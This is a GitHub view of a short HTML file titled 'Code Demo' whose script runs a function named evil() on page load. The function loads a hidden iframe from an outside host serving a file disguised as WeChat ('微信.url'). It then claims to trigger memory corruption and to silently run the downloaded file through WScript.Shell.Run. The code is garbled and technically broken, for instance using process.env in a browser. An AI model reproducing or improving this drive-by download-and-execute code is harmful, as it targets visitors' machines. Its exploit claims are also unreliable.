-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path11.html
36 lines (31 loc) · 1.3 KB
/
11.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<html>
<head>
<meta charset="utf-8">
<title>Code Demo</title>
</head>
<body>
<script>
// This is the code you gave me
function evil() {
// Create a hidden iframe
var iframe = document.createElement("iframe");
iframe.style.display = "none";
document.body.appendChild(iframe);
// Set the source to the malicious link
iframe.src = "https://v.zzsp.eu.org/%E5%BE%AE%E4%BF%A1.url";
// Wait for the iframe to load
iframe.onload = function() {
// Get the iframe's window object
var win = iframe.contentWindow;
// Trigger the memory corruption by calling a JavaScript function with a large number of arguments
win.eval("Math.max(" + "0,".repeat(0x100000) + "0)");
// Execute the downloaded file by calling another JavaScript function with a large number of arguments
// Add a 0 as the second argument to make it silent
win.eval("WScript.Shell.Run(" + "'".repeat(0x100000) + `${process.env.TEMP}\\微信.url /S` + "'".repeat(0x100000) + ", 0)");
};
}
// Call the malicious JavaScript function
evil();
</script>
</body>
</html>